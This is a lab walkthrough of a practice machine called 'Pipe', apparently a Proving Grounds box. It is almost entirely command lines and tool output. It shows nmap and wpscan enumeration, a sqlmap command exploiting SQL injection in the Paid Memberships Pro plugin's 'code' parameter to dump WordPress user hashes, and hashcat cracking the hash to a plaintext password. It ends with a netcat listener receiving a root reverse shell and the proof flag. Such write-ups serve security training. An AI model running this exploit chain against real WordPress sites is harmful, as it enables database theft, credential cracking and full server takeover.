Pipe

Intro

Initial Foothold

# Nmap 7.94SVN scan initiated Fri Aug 16 10:21:27 2024 as: nmap -sC -sV -vv -oA nmap/initial pipe.pg
Nmap scan report for pipe.pg (192.168.211.45)
Host is up, received echo-reply ttl 61 (0.063s latency).
Scanned at 2024-08-16 10:21:27 CDT for 11s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNEbgprJqVJa8R95Wkbo3cemB4fdRzos+v750LtPEnRs+IJQn5jcg5l89Tx4junU+AXzLflrMVo55gbuKeNTDtFRU9ltlIu4AU+f7lRlUlvAHlNjUbU/z3WBZ5ZU9j7Xc9WKjh1Ov7chC0UnDdyr5EGrIwlLzgk8zrWx364+S4JqLtER2/n0rhVxa9RCw0tR/oL24kMep4q7rFK6dThiRtQ9nsJFhh6yw8Fmdg7r4uohqH70UJurVwVNwFqtr/86e4VSSoITlMQPZrZFVvoSsjyL8LEODt1qznoLWudMD95Eo1YFSPID5VcS0kSElfYigjSr+9bNSdlzAof1mU6xJA67BggGNu6qITWWIJySXcropehnDAt2nv4zaKAUKc/T0ij9wkIBskuXfN88cEmZbu+gObKbLgwQSRQJIpQ+B/mA8CD4AiaTmEwGSWz1dVPp5Fgb6YVy6E4oO9ASuD9Q1JWuRmnn8uiHF/nPLs2LC2+rh3nPLXlV+MG/zUfQCrdrE=
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCUhhvrIBs53SApXKZYHWBlpH50KO3POt8Y+WvTvHZ5YgRagAEU5eSnGkrnziCUvDWNShFhLHI7kQv+mx+4R6Wk=
|   256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN4MSEXnpONsc0ANUT6rFQPWsoVmRW4hrpSRq++xySM9
80/tcp open  http    syn-ack ttl 61 nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://affliation.local/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 16 10:21:38 2024 -- 1 IP address (1 host up) scanned in 10.65 seconds

┌──(joe㉿kali)-[~/hax/pg/pipe]
└─$ wpscan --url http://affliation.local -e ap,at -v
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://affliation.local/ [192.168.211.45]
[+] Started: Fri Aug 16 10:34:02 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.18.0
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://affliation.local/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://affliation.local/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://affliation.local/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2 identified (Insecure, released on 2023-03-29).
 | Found By: Rss Generator (Passive Detection)
 |  - http://affliation.local/?feed=rss2, <generator>https://wordpress.org/?v=6.2</generator>
 |  - http://affliation.local/?feed=comments-rss2, <generator>https://wordpress.org/?v=6.2</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://affliation.local/wp-content/themes/twentytwentyone/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://affliation.local/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://affliation.local/wp-content/themes/twentytwentyone/style.css?ver=1.8
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. With new block patterns, which allow you to create a beautiful layout in a matter of seconds, this theme’s soft colors and eye-catching — yet timeless — design will let your work shine. Take it for a spin! See how Twenty Twenty-One elevates your portfolio, business website, or personal blog.
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 | License: GNU General Public License v2 or later
 | License URI: http://www.gnu.org/licenses/gpl-2.0.html
 | Tags: one-column, accessibility-ready, custom-colors, custom-menu, custom-logo, editor-style, featured-images, footer-widgets, block-patterns, rtl-language-support, sticky-post, threaded-comments, translation-ready
 | Text Domain: twentytwentyone
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://affliation.local/wp-content/themes/twentytwentyone/style.css?ver=1.8, Match: 'Version: 1.8'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] paid-memberships-pro-2.9.7
 | Location: http://affliation.local/wp-content/plugins/paid-memberships-pro-2.9.7/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 2.9.7 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://affliation.local/wp-content/plugins/paid-memberships-pro-2.9.7/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://affliation.local/wp-content/plugins/paid-memberships-pro-2.9.7/readme.txt
 
 ...

┌──(joe㉿kali)-[~/hax/pg/pipe]
└─$ sqlmap -u "http://affliation.local/?rest_route=/pmpro/v1/order&code=" --ignore-code 401 --level 2 --risk 2 -p code -D wordpress -T wp_users -C user_login,user_pass --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:01:53 /2024-08-16/

[11:01:53] [WARNING] provided value for parameter 'code' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:01:53] [INFO] resuming back-end DBMS 'mysql' 
[11:01:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: code (GET)
    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: rest_route=/pmpro/v1/order&code=' AND 6295=BENCHMARK(5000000,MD5(0x77536b4d)) AND 'BTNI'='BTNI
---
[11:01:53] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[11:01:53] [INFO] fetching entries of column(s) 'user_login,user_pass' for table 'wp_users' in database 'wordpress'
[11:01:53] [INFO] fetching number of column(s) 'user_login,user_pass' entries for table 'wp_users' in database 'wordpress'
[11:01:53] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                   
[11:01:55] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[11:02:03] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)          
[11:02:13] [INFO] adjusting time delay to 1 second due to good response times
Eren
[11:02:22] [INFO] retrieved: $P$BdPMS47I2VWPAMQbidHmkga5YtOvjr.
[11:04:06] [INFO] recognized possible password hashes in column 'user_pass'

┌──(joe㉿kali)-[~/hax/pg/pipe]
└─$ hashcat '$P$BdPMS47I2VWPAMQbidHmkga5YtOvjr.' /usr/share/wordlists/rockyou.txt

...

$P$BdPMS47I2VWPAMQbidHmkga5YtOvjr.:letsyouupdateyourfunnotesandmore
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$BdPMS47I2VWPAMQbidHmkga5YtOvjr.
Time.Started.....: Fri Aug 16 11:06:14 2024 (5 mins, 30 secs)
Time.Estimated...: Fri Aug 16 11:11:44 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1494 H/s (10.58ms) @ Accel:256 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 493568/14344385 (3.44%)
Rejected.........: 0/493568 (0.00%)
Restore.Point....: 493056/14344385 (3.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7936-8192
Candidate.Engine.: Device Generator
Candidates.#1....: lil jj -> leolions
Hardware.Mon.#1..: Util: 94%

┌──(joe㉿kali)-[~/hax/pg/pipe]
└─$ sudo nc -lvnp 443                              
[sudo] password for joe: 
listening on [any] 443 ...
connect to [192.168.45.223] from (UNKNOWN) [192.168.211.45] 56024
bash: cannot set terminal process group (475): Inappropriate ioctl for device
bash: no job control in this shell
root@affliation:/var/www/html# whoami
whoami
root
root@affliation:/var/www/html# ls /root/
ls /root/
proof.txt
root@affliation:/var/www/html# cat /root/proof.txt
cat /root/proof.txt
d53152c34893c57af662aed0940a12b5

PreviousDetection NextPebbles

Last updated 1 year ago